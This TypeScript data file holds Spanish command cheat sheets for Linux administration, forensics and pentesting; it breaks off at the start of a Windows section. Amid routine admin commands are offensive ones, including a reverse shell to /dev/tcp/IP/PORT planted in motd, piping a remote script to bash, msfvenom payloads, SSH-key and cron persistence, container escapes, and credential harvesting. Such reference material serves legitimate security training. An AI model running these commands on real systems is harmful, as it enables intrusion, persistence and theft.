/* Cheatsheets: Linux, Windows, red, privesc, Active Directory, forense, contenedores…
   Ampliación masiva — todo copy-paste ready para pentesting autorizado, CTFs y administración. */

export interface CheatCategory {
  name: string
  items: { cmd: string; desc: string }[]
}

export const LINUX_CHEATS: CheatCategory[] = [
  {
    name: 'Red e interfaces',
    items: [
      { cmd: 'ip -c a && ip -c r', desc: 'IPs y tabla de rutas con color' },
      { cmd: 'ip -br a', desc: 'Resumen compacto de interfaces y IPs' },
      { cmd: 'ip -c neigh', desc: 'Tabla ARP/vecinos (equivale a arp -a)' },
      { cmd: 'ss -tulpn', desc: 'Puertos en escucha y proceso asociado' },
      { cmd: 'ss -tan state established', desc: 'Solo conexiones establecidas' },
      { cmd: 'sudo lsof -i :443', desc: 'Quién usa el puerto 443' },
      { cmd: 'ip route get 8.8.8.8', desc: 'Por qué interfaz/ruta sale un destino' },
      { cmd: 'cat /etc/resolv.conf', desc: 'DNS configurados' },
      { cmd: 'resolvectl status', desc: 'Estado del resolvedor DNS (systemd)' },
      { cmd: 'nmcli dev wifi list', desc: 'Redes WiFi visibles' },
      { cmd: 'nmcli con show && nmcli con up "Nombre"', desc: 'Listar y levantar conexiones' },
      { cmd: 'ip link set dev eth0 up && ip a add 192.168.1.50/24 dev eth0', desc: 'Configurar IP estática on-the-fly' },
      { cmd: 'sudo ip route add 10.10.0.0/16 via 192.168.1.1', desc: 'Añadir ruta estática' },
      { cmd: 'ethtool eth0', desc: 'Estado del enlace, velocidad, duplex' },
      { cmd: 'cat /proc/net/dev', desc: 'Estadísticas por interfaz' },
      { cmd: 'tcpdump -i eth0 -nn -c 100', desc: 'Capturar 100 paquetes sin resolver nombres' },
      { cmd: 'tcpdump -i eth0 tcp port 80 -w cap.pcap', desc: 'Capturar HTTP a pcap para analizar' },
      { cmd: 'dig +short dominio.com && dig -x 1.2.3.4', desc: 'Resolución directa e inversa' },
      { cmd: 'dig @8.8.8.8 dominio.com ANY +noall +answer', desc: 'Consulta ANY a un resolver concreto' },
      { cmd: 'curl -s ifconfig.me', desc: 'IP pública de salida' },
      { cmd: 'nmap -sV -T4 --top-ports 1000 objetivo', desc: 'Escaneo rápido de top puertos con versiones' },
      { cmd: 'nmap -sC -sV -oN scan.txt 10.10.10.0/24', desc: 'Escaneo con scripts y salida a fichero' },
      { cmd: 'nmap -sn 192.168.1.0/24', desc: 'Descubrir hosts vivos (ping sweep)' },
      { cmd: 'nc -zv host 1-1000 2>&1 | grep succeeded', desc: 'Escaneo de puertos con netcat' },
    ],
  },
  {
    name: 'Ficheros y búsqueda',
    items: [
      { cmd: 'find / -type f -name "*.conf" 2>/dev/null', desc: 'Buscar ficheros de configuración' },
      { cmd: 'find / -mtime -1 -type f 2>/dev/null | grep -vE "/(proc|sys|dev)"', desc: 'Modificados en las últimas 24h' },
      { cmd: 'find / -size +100M -type f 2>/dev/null -exec ls -lh {} \\;', desc: 'Ficheros grandes (limpieza/ocultación)' },
      { cmd: 'find / -perm -4000 -type f 2>/dev/null', desc: 'SUID: candidatos a escalada' },
      { cmd: 'find / -perm -2000 -type f 2>/dev/null', desc: 'SGID' },
      { cmd: 'find / -writable -type d 2>/dev/null | grep -v proc', desc: 'Directorios escribibles' },
      { cmd: 'grep -rn "password" /etc /home --include="*" 2>/dev/null', desc: 'Buscar credenciales en texto claro' },
      { cmd: 'grep -riE "pass(word)?[=: ]" /var/www 2>/dev/null | head', desc: 'Passwords hardcoded en webapps' },
      { cmd: 'stat fichero', desc: 'Metadatos completos de un fichero' },
      { cmd: 'getfacl fichero', desc: 'ACLs extendidas' },
      { cmd: 'file fichero && xxd fichero | head', desc: 'Tipo real y primeros bytes (magic)' },
      { cmd: 'ls -la --time-style=full-iso', desc: 'Timestamps precisos (forense)' },
      { cmd: 'lsof +D /directorio', desc: 'Quién tiene abierto qué en un directorio' },
      { cmd: 'diff -u original.txt modificado.txt', desc: 'Diferencias línea a línea' },
      { cmd: 'rsync -avzP dir/ destino/', desc: 'Copiar con progreso y reanudar' },
      { cmd: 'tar czf backup.tgz dir/ --checkpoint=100', desc: 'Comprimir con progreso' },
      { cmd: 'tar tzf backup.tgz | head', desc: 'Listar contenido del tar sin extraer' },
      { cmd: 'sha256sum fichero', desc: 'Integridad SHA-256' },
      { cmd: 'dd if=/dev/sda of=disco.img bs=64K status=progress', desc: 'Imagen forense de disco' },
      { cmd: 'shred -vzn 3 fichero', desc: 'Borrado seguro (3 pasadas aleatorias)' },
      { cmd: 'ln -s /objetivo enlace && readlink -f enlace', desc: 'Enlace simbólico y resolución' },
      { cmd: 'chattr +i fichero && lsattr fichero', desc: 'Fichero inmutable (ni root lo borra fácil)' },
    ],
  },
  {
    name: 'Procesos y sistema',
    items: [
      { cmd: 'ps aux --sort=-%mem | head', desc: 'Top consumo de memoria' },
      { cmd: 'ps auxf | pager', desc: 'Árbol de procesos (ver padres/hijos)' },
      { cmd: 'top -b -n1 | head -20', desc: 'Snapshot de top para scripts' },
      { cmd: 'pidof sshd && pgrep -a nginx', desc: 'Encontrar PIDs por nombre' },
      { cmd: 'kill -9 $(lsof -t -i:8080)', desc: 'Matar lo que ocupe el puerto 8080' },
      { cmd: 'ltrace ./bin && strace -c ./bin', desc: 'Llamadas a librerías y syscalls (reversing)' },
      { cmd: 'cat /proc/$$/status | grep -i caps', desc: 'Capabilities del proceso actual' },
      { cmd: 'systemctl list-timers --all', desc: 'Timers de systemd (como cron)' },
      { cmd: 'systemctl list-units --type=service --state=running', desc: 'Servicios activos' },
      { cmd: 'journalctl -u ssh -f', desc: 'Logs SSH en vivo' },
      { cmd: 'journalctl --since "1 hour ago" -p err', desc: 'Errores de la última hora' },
      { cmd: 'uname -a && cat /etc/os-release', desc: 'Kernel y distro (enum básica)' },
      { cmd: 'env && cat /proc/self/environ | tr "\\0" "\\n"', desc: 'Variables de entorno (credenciales?)' },
      { cmd: 'ulimit -a', desc: 'Límites de recursos del shell' },
      { cmd: 'watch -n1 "uptime && free -h"', desc: 'Monitorizar carga y RAM en vivo' },
      { cmd: 'dmidecode -t system 2>/dev/null', desc: 'Fabricante/serie del equipo (requiere root)' },
      { cmd: 'lsblk -f && df -hT', desc: 'Discos, particiones y sistemas de ficheros' },
      { cmd: 'sysctl kernel.randomize_va_space', desc: 'ASLR activado (2)' },
    ],
  },
  {
    name: 'Usuarios y permisos',
    items: [
      { cmd: 'id && whoami && hostname', desc: 'Identidad actual (enum inicial)' },
      { cmd: 'cat /etc/passwd | grep -E "sh$"', desc: 'Usuarios con shell (humanos/servicios)' },
      { cmd: 'sudo -l', desc: 'Qué puedo ejecutar como sudo (privesc nº1)' },
      { cmd: 'cat /etc/group | grep -E "(sudo|docker|lxd|wheel|adm)"', desc: 'Grupos interesantes' },
      { cmd: 'awk -F: \'{print $1, $3}\' /etc/passwd | awk \'$2 >= 1000 {print}\'', desc: 'Usuarios "humanos" (UID>=1000)' },
      { cmd: 'passwd usuario && chage -l usuario', desc: 'Cambiar contraseña y política de caducidad' },
      { cmd: 'useradd -m -s /bin/bash dev && usermod -aG sudo dev', desc: 'Crear usuario admin' },
      { cmd: 'chmod 750 script.sh && chown root:grupo script.sh', desc: 'Permisos rwx correctos por grupo' },
      { cmd: 'setfacl -m u:dev:rx /directorio && getfacl /directorio', desc: 'Conceder acceso puntual con ACL' },
      { cmd: 'ls -la /etc/shadow 2>/dev/null', desc: '¿Es legible? = hash de root al alcance' },
      { cmd: 'sudo cat /etc/shadow | head -3', desc: 'Hashes del sistema (para hashcat/john)' },
      { cmd: 'w && last -a | head && lastb | head', desc: 'Sesiones activas, logins OK y fallidos' },
      { cmd: 'sudo -u usuario bash -c "id"', desc: 'Ejecutar como otro usuario' },
      { cmd: 'pkexec --disable-internal-agent /bin/bash 2>/dev/null', desc: 'Escalada vía polkit (si no parcheado)' },
    ],
  },
  {
    name: 'Cron, systemd y persistencia',
    items: [
      { cmd: 'ls -la /etc/cron* && crontab -l', desc: 'Cron jobs del sistema y del usuario' },
      { cmd: 'grep -rn "CRON" /var/log/syslog 2>/dev/null | tail', desc: 'Confirmar qué cron se ejecuta de verdad' },
      { cmd: 'find / -name "*.sh" -path "*cron*" -ls 2>/dev/null', desc: 'Scripts de cron (¿escribibles?)' },
      { cmd: '(crontab -l; echo "*/5 * * * * /home/u/.cfg/sync.sh") | crontab -', desc: 'Añadir tarea cron (persistencia)' },
      { cmd: 'systemctl cat servicio.service', desc: 'Ver unit completo con drop-ins' },
      { cmd: 'systemctl edit --full servicio && systemctl daemon-reload', desc: 'Editar unit y recargar (ExecStart hijack)' },
      { cmd: 'ls -la /etc/systemd/system/ | grep -v want', desc: 'Units custom (posible secuestro)' },
      { cmd: 'systemd-analyze security --no-pager | grep UNSAFE | head', desc: 'Servicios sin sandboxing' },
      { cmd: 'echo "ssh-ed25519 AAAA... user@host" >> ~/.ssh/authorized_keys', desc: 'Persistencia por clave SSH' },
      { cmd: 'cat ~/.ssh/id_ed25519.pub | ssh user@host "cat >> ~/.ssh/authorized_keys"', desc: 'Instalar tu clave en el objetivo' },
      { cmd: 'printf \'#!/bin/bash\\n/bin/bash -i >& /dev/tcp/IP/PORT 0>&1\\n\' > /etc/update-motd.d/99x', desc: 'Persistencia en motd (CTF, requiere root)' },
    ],
  },
  {
    name: 'Hardening y auditoría',
    items: [
      { cmd: 'auditctl -w /etc/passwd -p wa -k identity', desc: 'Auditar cambios en /etc/passwd' },
      { cmd: 'auditctl -a always,exit -F arch=b64 -S execve -k exec', desc: 'Registrar TODAS las ejecuciones' },
      { cmd: 'ausearch -k identity --format text | tail', desc: 'Consultar eventos auditados' },
      { cmd: 'ufw status verbose && ufw limit 22/tcp', desc: 'Firewall UFW + rate-limit SSH' },
      { cmd: 'iptables -L -n -v && iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 3 -j DROP', desc: 'Reglas y anti-fuerza bruta' },
      { cmd: 'ss -tulpn | grep -v "127.0.0.1\\|::1"', desc: 'Servicios expuestos (no locales) — superficie de ataque' },
      { cmd: 'grep -E "^(PermitRootLogin|PasswordAuthentication)" /etc/ssh/sshd_config', desc: 'Revisión SSH: ¿root y passwords activos?' },
      { cmd: 'apt list --upgradable 2>/dev/null | head && dpkg -l | wc -l', desc: 'Pendientes de actualizar y nº de paquetes' },
      { cmd: 'rpm -Va 2>/dev/null | head || debsums -c 2>/dev/null | head', desc: 'Ficheros del sistema modificados (rootkits)' },
      { cmd: 'find / -name ".*" -type f -perm -u+x 2>/dev/null | grep -vE "/(proc|sys)"', desc: 'Ficheros ocultos ejecutables (sospechoso)' },
      { cmd: 'cat /etc/ld.so.preload 2>/dev/null; ls -la /etc/ld.so.conf.d/', desc: 'Librerías precargadas (técnica de rootkit)' },
      { cmd: 'hashcat -m 1000 hashes.txt rockyou.txt', desc: 'Crackear hashes NTLM (si vinieron de Windows)' },
      { cmd: 'john --wordlist=rockyou.txt hashes.txt', desc: 'Crackear hashes shadow ($y$/$6$)' },
      { cmd: 'lynis audit system --quick', desc: 'Auditoría completa automática' },
      { cmd: 'chkrootkit 2>/dev/null || rkhunter --check --sk', desc: 'Detección de rootkits' },
    ],
  },
  {
    name: 'Text-fu (procesar salida)',
    items: [
      { cmd: 'comando 2>&1 | tee log.txt', desc: 'Ver y guardar salida a la vez' },
      { cmd: 'cut -d: -f1 /etc/passwd', desc: 'Primera columna (usuarios)' },
      { cmd: 'awk \'{print $1}\' fichero | sort | uniq -c | sort -rn | head', desc: 'Top de valores repetidos' },
      { cmd: 'sed -n "10,20p" fichero', desc: 'Ver líneas 10-20' },
      { cmd: 'sed -i "s/viejo/nuevo/g" fichero && cat fichero', desc: 'Reemplazo in-place' },
      { cmd: 'tr -d "\\r" < fichero_dos.txt > fichero.txt', desc: 'Convertir ficheros DOS→Unix' },
      { cmd: 'head -c 1000 /dev/urandom | base64 | head -c 32; echo', desc: 'Generar string aleatorio' },
      { cmd: 'openssl rand -base64 32', desc: 'Clave aleatoria segura' },
      { cmd: 'diff <(cmd1) <(cmd2)', desc: 'Comparar salidas de dos comandos' },
      { cmd: 'xargs -P 4 -I{} curl -s -o /dev/null -w "%{{http_code}} %{{url_effective}}\\n" {} < urls.txt', desc: 'Peticiones paralelas con xargs' },
      { cmd: 'jq . respuesta.json && jq -r ".claves[]? | .nombre" r.json', desc: 'Parsear JSON en shell' },
      { cmd: 'curl -s https://api.ejemplo.com | python3 -m json.tool', desc: 'Embeber JSON bonito sin jq' },
      { cmd: 'while read -r line; do echo "-> $line"; done < fichero.txt', desc: 'Bucle sobre fichero (iterar targets)' },
      { cmd: 'for ip in $(seq 1 254); do ping -c1 -W1 192.168.1.$ip & done; wait', desc: 'Barrido de ping paralelo' },
    ],
  },
  {
    name: 'Transferencia de ficheros',
    items: [
      { cmd: 'python3 -m http.server 8000', desc: 'Servidor web rápido (en el atacante)' },
      { cmd: 'wget http://IP:8000/fichero -O /tmp/f && chmod +x /tmp/f', desc: 'Descarga en el objetivo' },
      { cmd: 'curl -o /tmp/f http://IP:8000/fichero', desc: 'Descarga con curl' },
      { cmd: 'nc -lvnp 9001 > fichero  # |  nc IP 9001 < fichero', desc: 'Transferir con netcat (sin servidor)' },
      { cmd: 'base64 fichero > fichero.b64', desc: 'Transferir "pegando" por shell sin ficheros' },
      { cmd: 'scp -i clave.pem fichero user@host:/destino/', desc: 'Copia SSH segura' },
      { cmd: 'tar czf - dir/ | ssh user@host "tar xzf - -C /destino"', desc: 'Stream de directorio por SSH' },
      { cmd: 'certutil -urlcache -f http://IP/f C:\\\\f  # (win desde linux: dar URL)', desc: 'Descarga desde Windows (nota)' },
      { cmd: 'impacket-smbserver share $(pwd) -smb2support', desc: 'Compartición SMB para exfiltrar/impantar' },
      { cmd: 'gopher://  # si solo hay SSRF: exfil por gopher con URL-encode', desc: 'Exfiltración vía SSRF (referencia)' },
    ],
  },
  {
    name: 'SSH avanzado',
    items: [
      { cmd: 'ssh -i id_rsa -p 2222 user@host', desc: 'Conexión con clave y puerto custom' },
      { cmd: 'ssh -L 8080:interno:80 user@puente', desc: 'Túnel local: accesible en localhost:8080' },
      { cmd: 'ssh -R 9000:localhost:22 user@atacante', desc: 'Túnel inverso (abrir puerto en atacante)' },
      { cmd: 'ssh -D 1080 user@host', desc: 'Proxy SOCKS5 (proxychains.conf: socks5 127.0.0.1 1080)' },
      { cmd: 'ssh -J salto1,salto2 destino', desc: 'Cadena de saltos (ProxyJump)' },
      { cmd: 'ssh-keygen -t ed25519 -C "comentario"', desc: 'Generar par de claves moderno' },
      { cmd: 'ssh-copy-id user@host', desc: 'Instalar tu clave pública' },
      { cmd: 'cat ~/.ssh/id_rsa  # archivo "BEGIN OPENSSH PRIVATE KEY"', desc: 'Si es legible: cráckear con ssh2john + rockyou' },
      { cmd: 'ssh -o StrictHostKeyChecking=no user@host', desc: 'Saltar confirmación (scripts/lab)' },
      { cmd: 'grep -rE "(User|HostName) " ~/.ssh/config', desc: 'Hosts configurados (pivoting info)' },
    ],
  },
  {
    name: 'WiFi y wireless',
    items: [
      { cmd: 'iw dev && ip link set wlan0 up', desc: 'Interfaces wireless y activar modo managed' },
      { cmd: 'airmon-ng start wlan0', desc: 'Activar modo monitor (wlan0mon)' },
      { cmd: 'airodump-ng wlan0mon', desc: 'Escanear APs y clientes en vivo' },
      { cmd: 'airodump-ng -c 6 --bssid XX:XX -w cap wlan0mon', desc: 'Capturar handshake de un AP' },
      { cmd: 'aireplay-ng -0 5 -a BSSID wlan0mon', desc: 'Deauth para forzar handshake (¡solo lab/autorizado!)' },
      { cmd: 'aircrack-ng cap-01.cap -w rockyou.txt', desc: 'Crackear handshake WPA' },
      { cmd: 'hashcat -m 22000 cap.hc22000 rockyou.txt', desc: 'Crackear hash 22000 (convertido)' },
      { cmd: 'hcxdumptool -i wlan0 -o out.pcapng --enable_status=1', desc: 'Capturar PMKID sin clientes' },
      { cmd: 'iwconfig && iw phy', desc: 'Info del driver y capacidades' },
    ],
  },
  {
    name: 'Docker y contenedores',
    items: [
      { cmd: 'docker ps -a && docker images', desc: 'Contenedores e imágenes' },
      { cmd: 'docker exec -it cont bash && docker logs -f cont 100', desc: 'Entrar y ver logs' },
      { cmd: 'docker inspect cont | jq ".[0].Mounts,.Config.Env"', desc: 'Monturas y variables (¡secretos!)' },
      { cmd: 'docker run -v /:/host --rm -it alpine chroot /host sh', desc: 'ESCAPE: montar host en contenedor privilegiado' },
      { cmd: 'docker run --privileged --rm -it alpine sh -c "mount -t cgroup cgroup /mnt"', desc: 'Abusar --privileged (escapada clásica)' },
      { cmd: 'docker cp cont:/ruta/fichero ./fichero', desc: 'Sacar ficheros de un contenedor' },
      { cmd: 'docker save img -o img.tar && docker load -i img.tar', desc: 'Exportar/importar imágenes' },
      { cmd: 'find /var/run/docker.sock -perm -w 2>/dev/null', desc: 'Socket docker accesible = root gratis' },
      { cmd: 'docker stats --no-stream', desc: 'Consumo instantáneo por contenedor' },
      { cmd: 'cat /proc/1/cgroup | grep -i docker', desc: '¿Estoy DENTRO de un contenedor? (enum)' },
      { cmd: 'ls -la /.dockerenv 2>/dev/null && cat /proc/self/mountinfo | head', desc: 'Detección de contenedor (más fiable)' },
    ],
  },
  {
    name: 'Bash avanzado y scripting',
    items: [
      { cmd: 'set -euo pipefail', desc: 'Modo estricto para scripts' },
      { cmd: 'fichero="/tmp/a.txt"; echo "${fichero##*/}"', desc: 'Basename sin llamada externa' },
      { cmd: 'comando || { echo "falló"; exit 1; }', desc: 'Manejo de error inline' },
      { cmd: 'if [[ "$x" =~ ^[0-9]+$ ]]; then echo num; fi', desc: 'Regex en bash' },
      { cmd: 'mapfile -t lineas < fichero.txt', desc: 'Leer fichero a array' },
      { cmd: 'trap "echo bye; rm -f /tmp/lock" EXIT', desc: 'Cleanup garantizado' },
      { cmd: 'mktemp -d && cd $_', desc: 'Directorio temporal seguro' },
      { cmd: 'comando | while read -r l; do echo "$l"; done', desc: 'Pipeline con bucle seguro' },
      { cmd: 'readonly VAR="fijo" && local x=1  # en funciones', desc: 'Buenas prácticas de scope' },
      { cmd: 'shopt -s globstar && ls **/*.py', desc: 'Glob recursivo nativo' },
    ],
  },
  {
    name: 'Empaquetado y sistema',
    items: [
      { cmd: 'apt update && apt list --upgradable', desc: 'Actualizar índice y ver pendientes (Debian)' },
      { cmd: 'apt install paquete && apt remove --purge paquete', desc: 'Instalar/eliminar en Debian' },
      { cmd: 'apt-cache search texto && dpkg -S /ruta/fichero', desc: 'Buscar paquete y de quién es un fichero' },
      { cmd: 'pacman -Syu && pacman -S paquete', desc: 'Update e instalar (Arch)' },
      { cmd: 'pacman -Qs texto && pacman -Qi paquete && pacman -Qo fichero', desc: 'Buscar e info (Arch)' },
      { cmd: 'yay -S paquete-aur', desc: 'Instalar desde AUR (Arch)' },
      { cmd: 'dnf install paquete && dnf history', desc: 'RHEL/Fedora: instalar y ver histórico' },
      { cmd: 'rpm -qf /ruta/fichero && rpm -V paquete', desc: 'RHEL: dueño y verificación de paquete' },
      { cmd: 'zypper in paquete && snap list && flatpak list', desc: 'openSUSE y paquetes universales' },
      { cmd: 'add-apt-repository ppa:user/repo && apt update', desc: 'Añadir PPA (Ubuntu)' },
    ],
  },
  {
    name: 'Forense y análisis local',
    items: [
      { cmd: 'foremost -i imagen.img -o out/ && binwalk imagen', desc: 'Carving de ficheros y firmas embebidas' },
      { cmd: 'strings -n 8 fichero | grep -iE "pass|url|key"', desc: 'Strings interesantes' },
      { cmd: 'exiftool imagen.jpg && exiftool -gps:all foto.jpg', desc: 'Metadatos y GPS' },
      { cmd: 'mmls imagen.dd && fls -o 2048 imagen.dd', desc: 'Particiones y ficheros borrados (sleuthkit)' },
      { cmd: 'icat imagen.dd 1234 > recuperado.bin', desc: 'Recuperar inode concreto' },
      { cmd: 'photorec imagen.dd', desc: 'Recuperación de ficheros (testdisk)' },
      { cmd: 'volatility -f dump.mem imageinfo', desc: 'Análisis de volcado de RAM' },
      { cmd: 'grep -a -b "texto" binario', desc: 'Buscar texto en binario con offset' },
      { cmd: 'hexdump -C fichero | head -20', desc: 'Hex dump inicial (magic bytes)' },
      { cmd: 'stat --format="%n | a%y | m%y | c%y" *', desc: 'Timeline atime/mtime/ctime por fichero' },
    ],
  },
  {
    name: 'Monitorización y rendimiento',
    items: [
      { cmd: 'htop && iotop -o 2>/dev/null', desc: 'CPU/RAM y E/S de disco en vivo' },
      { cmd: 'nethogs && iftop', desc: 'Consumo de red por proceso y por conexión' },
      { cmd: 'vmstat 1 5 && iostat -xz 1', desc: 'Cuellos de botella de memoria y disco' },
      { cmd: 'perf top -g', desc: 'Perfilado de CPU en vivo' },
      { cmd: 'sar -n DEV 1 5 2>/dev/null', desc: 'Histórico/realtime de tráfico por interfaz' },
      { cmd: 'strace -p $(pidof proceso) -e trace=network', desc: 'Ver llamadas de red de un proceso' },
      { cmd: 'dmesg -wT | grep -iE "error|fail"', desc: 'Mensajes del kernel en vivo' },
      { cmd: 'sensors && smartctl -a /dev/sda 2>/dev/null', desc: 'Temperaturas y salud del disco' },
    ],
  },
  {
    name: 'Uno-liners útiles',
    items: [
      { cmd: 'comando && echo OK || echo FALLO', desc: 'Ejecución condicional legible' },
      { cmd: 'curl -s http://IP/peticion.txt | bash', desc: 'Ejecutar script remoto (¡revisa antes!)' },
      { cmd: 'watch -d ls -l /directorio', desc: 'Vigilar cambios resaltados' },
      { cmd: 'echo "comando" | at now + 5 minutes', desc: 'Programar ejecución puntual' },
      { cmd: 'nohup comando &> /dev/null & disown', desc: 'Ejecutar que sobreviva al logout' },
      { cmd: 'timeout 10 comando', desc: 'Límite de tiempo para comandos colgantes' },
      { cmd: 'flock /tmp/lock -c "solo_uno_a_la_vez"', desc: 'Evitar ejecuciones concurrentes' },
      { cmd: 'time comando && /usr/bin/time -v comando 2>&1 | head -20', desc: 'Medir tiempo y recursos' },
      { cmd: 'for i in {1..5}; do echo "intento $i"; sleep 1; done', desc: 'Bucle simple con retardo' },
      { cmd: 'history | tail -50 && history | grep ssh', desc: 'Historial del shell (¡credenciales!)' },
      { cmd: 'cat ~/.bash_history 2>/dev/null | tail -100', desc: 'Historial sin enriquecer (CTF: joyas)' },
    ],
  },
  {
    name: 'Herramientas de pentest (momento uso)',
    items: [
      { cmd: 'nikto -h http://objetivo', desc: 'Escáner web genérico rápido' },
      { cmd: 'gobuster dir -u http://objetivo -w /usr/share/wordlists/dirb/common.txt', desc: 'Bruteforce de directorios' },
      { cmd: 'feroxbuster -u http://objetivo -w wordlist --depth 2', desc: 'Fuzzing recursivo rápido (Rust)' },
      { cmd: 'wpscan --url http://objetivo --enumerate u,ap,at', desc: 'Auditar WordPress' },
      { cmd: 'sqlmap -u "http://obj/page?id=1" --batch --dbs', desc: 'SQLi automática (¡solo autorizado!)' },
      { cmd: 'hydra -l admin -P rockyou.txt ssh://objetivo', desc: 'Fuerza bruta SSH' },
      { cmd: 'hydra -l admin -P rockyou.txt objetivo http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"', desc: 'Fuerza bruta a formulario' },
      { cmd: 'enum4linux -a objetivo && smbclient -L //objetivo -N', desc: 'Enumeración SMB/NetBIOS' },
      { cmd: 'snmpwalk -v2c -c public objetivo', desc: 'Enumerar SNMP (community por defecto)' },
      { cmd: 'responder -I eth0 -dwPv', desc: 'Envenenar LLMNR/NBT-NS (captura hashes)' },
      { cmd: 'impacket-psexec usuario:pass@objetivo', desc: 'Shell remota en Windows con credenciales' },
      { cmd: 'searchsploit apache 2.4 && searchsploit -m 12345', desc: 'Buscar y copiar exploit local' },
      { cmd: 'msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o rev.elf', desc: 'Binario reverse shell para lab' },
      { cmd: 'msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/shell_reverse_tcp; set LHOST IP; run"', desc: 'Listener de metasploit' },
      { cmd: 'linpeas.sh -a > linpeas_out.txt 2>/dev/null', desc: 'Enum de privesc completa (curl | sh)' },
      { cmd: 'socat TCP-LISTEN:4444,fork EXEC:"/bin/bash -i",pty,stderr', desc: 'Listener con TTY completo' },
      { cmd: 'rlwrap -cAr nc -lvnp 4444', desc: 'Netcat con historial y flechas' },
      { cmd: 'proxychains4 nmap -sT -Pn objetivo', desc: 'Escanear a través de SOCKS' },
      { cmd: 'chisel server -p 8000 --reverse  # client: chisel client IP:8000 R:1080:socks', desc: 'Túnel SOCKS sobre HTTP' },
      { cmd: 'weasyprint --version 2>/dev/null; sshuttle -r user@host 10.10.0.0/16 --dns', desc: 'VPN-over-SSH transparente' },
    ],
  },
  {
    name: 'systemd en profundidad',
    items: [
      { cmd: 'systemd-analyze blame | head', desc: 'Qué servicios tardan más en arrancar' },
      { cmd: 'systemd-analyze critical-chain sshd.service', desc: 'Cadena de dependencias lenta de un servicio' },
      { cmd: 'systemctl show servicio -p ExecStart,User,EnvironmentFiles', desc: 'Propiedades clave de un unit (auditoría de privesc)' },
      { cmd: 'systemctl list-dependencies servicio --reverse', desc: 'Quién depende de este servicio (impacto al pararlo)' },
      { cmd: 'systemctl list-sockets && systemctl list-timers --all', desc: 'Sockets activados y timers equivalentes a cron' },
      { cmd: 'systemd-run --on-calendar="*-*-* 03:00:00" /ruta/script.sh', desc: 'Timer efímero sin crear unit a mano' },
      { cmd: 'systemctl daemon-reload && systemctl restart servicio', desc: 'Tras editar un unit: recargar y aplicar' },
      { cmd: 'journalctl -u servicio -b --no-pager | tail -50', desc: 'Logs del servicio desde el último boot' },
      { cmd: 'systemd-analyze verify /etc/systemd/system/miunit.service', desc: 'Validar un unit antes de activarlo' },
      { cmd: 'loginctl show-user $USER', desc: 'Sesiones, lingering y límites del usuario' },
      { cmd: 'sudo systemctl enable --now servicio', desc: 'Activar y arrancar en un paso' },
      { cmd: 'systemctl mask servicio && systemctl unmask servicio', desc: 'Bloquear totalmente un servicio (ni manual)' },
    ],
  },
  {
    name: 'Umask y ACLs',
    items: [
      { cmd: 'umask 027 && touch f && mkdir d && ls -l f && ls -ld d', desc: 'Ver efecto real de umask sobre fichero y directorio' },
      { cmd: 'umask -S', desc: 'Umask en formato simbólico (u=rwx,g=rx,o=)' },
      { cmd: 'getfacl --absolute-names fichero | head', desc: 'ACL efectivas incluyendo la máscara' },
      { cmd: 'setfacl -R -m g:devs:rX -m d:g:devs:rX /srv/app', desc: 'ACL recursiva + default para ficheros nuevos' },
      { cmd: 'getfacl dir1 | setfacl --set-file=- dir2', desc: 'Clonar ACLs entre dos rutas' },
      { cmd: 'setfacl -x u:usuario fichero && setfacl -b fichero', desc: 'Quitar una ACL concreta o todas' },
      { cmd: 'chattr +a fichero && lsattr fichero', desc: 'Solo-append (logs inmutables para el atacante)' },
      { cmd: 'find . -perm /o+w -type f 2>/dev/null', desc: 'Todo lo mundo-escribible del árbol' },
      { cmd: 'install -m 640 -o root -g www-data conf /etc/app/', desc: 'Copiar con permisos y dueño definidos de una vez' },
      { cmd: 'namei -l /ruta/profunda/fichero', desc: 'Permisos de TODA la ruta (troubleshooting clásico)' },
    ],
  },
  {
    name: 'Logs y auditoría defensiva',
    items: [
      { cmd: 'journalctl --disk-usage && sudo journalctl --vacuum-size=200M', desc: 'Tamaño de logs y recorte' },
      { cmd: 'lastlog 2>/dev/null | grep -v Never', desc: 'Último login de cada cuenta' },
      { cmd: 'ausearch -m USER_AUTH -ts today | tail', desc: 'Autenticaciones de hoy (auditd)' },
      { cmd: 'journalctl _COMM=sudo -a | grep -A2 "command"', desc: 'Comandos ejecutados con sudo' },
      { cmd: 'awk "/Failed password/ {print $(NF-3)}" /var/log/auth.log | sort | uniq -c | sort -rn | head', desc: 'Top IPs atacantes por SSH (one-liner)' },
      { cmd: 'last -x reboot shutdown | head', desc: 'Historial de reinicios y apagados' },
      { cmd: 'auditctl -w /etc/sudoers -p wa -k sudoers_change', desc: 'Vigilar cambios en sudoers' },
      { cmd: 'journalctl -k | grep -iE "usb|hid"', desc: 'Dispositivos USB conectados (kernel)' },
      { cmd: 'sudo ausearch -i -k exec | tail -30', desc: 'Ejecuciones auditadas interpretadas' },
      { cmd: 'grep -c "session opened" /var/log/auth.log', desc: 'Volumen de sesiones (baseline de actividad)' },
    ],
  },
  {
    name: 'Kernel y red avanzada',
    items: [
      { cmd: 'lsmod && modinfo e1000e | head', desc: 'Módulos cargados y metadatos de uno' },
      { cmd: 'sudo sysctl -w net.ipv4.ip_forward=1', desc: 'Habilitar forwarding (pivoting/router)' },
      { cmd: 'sudo tc qdisc add dev eth0 root netem delay 100ms', desc: 'Inyectar latencia (tests de red en lab)' },
      { cmd: 'ss -s && cat /proc/net/sockstat', desc: 'Resumen de sockets y límites' },
      { cmd: 'conntrack -L 2>/dev/null | head', desc: 'Tabla de conexiones NAT/conntrack' },
      { cmd: 'ip -s link show eth0', desc: 'Estadísticas por interfaz (dropped/errors)' },
      { cmd: 'sudo nft list ruleset | head -50', desc: 'Ruleset nftables completo' },
      { cmd: 'cat /proc/sys/net/ipv4/tcp_congestion_control', desc: 'Algoritmo de control de congestión' },
      { cmd: 'perf stat -e cycles,instructions -- ls /', desc: 'Medir rendimiento de un comando' },
      { cmd: 'sudo dmesg -T | grep -i oom', desc: 'Asesinatos por falta de memoria (OOM)' },
    ],
  },
]

export const WINDOWS_CHEATS: CheatCategory[] = [
  {
    name: 'Sistema y red',
    items: [
      { cmd: 'ipconfig /all && route print', desc: 'IPs y tabla de rutas' },
      { cmd: 'netstat -abno | findstr LISTEN', desc: 'Puertos en escucha y PID' },
      { cmd: 'arp -a', desc: 'Tabla ARP' },
      { cmd: 'Get-NetIPAddress | ft', desc: 'IPs (PowerShell moderno)' },
